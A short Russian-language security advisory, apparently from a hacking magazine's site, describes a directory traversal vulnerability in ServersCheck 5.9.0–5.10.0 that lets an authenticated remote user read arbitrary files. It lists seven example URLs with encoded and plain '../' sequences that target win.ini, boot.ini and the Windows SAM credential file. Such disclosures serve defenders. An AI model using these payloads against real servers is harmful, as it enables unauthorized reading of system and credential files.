Обход каталога в ServersCheck

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: ServersCheck 5.9.0 - 5.10.0

Уязвимость позволяет удаленному
авторизованному пользователю просмотреть
произвольные файлы на системе. Удаленный
авторизованный пользователь может с
помощью специально сформированного URL
просмотреть произвольные файлы на системе.
П

ример:

http://[target]:1272/%2E%2E/%2E%2E/%2E%2E/ %2E%2E/%2E%2E/windows/win.ini
http://[target]:1272/%2f..%2f..%2f..%2f..%2f..%2f ..%2f..%2f..%2f..%2f../boo
t.ini
http://[target]:1272/..%2F..%2F..%2F..%2F..%2F ../windows/repair/sam
http://[target]:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://[target]:1272/../../ ../../../../../../../boot.ini
http://[target]:1272/../../../../../../../../boot.ini
http://[target]:1272/../../../../boot.ini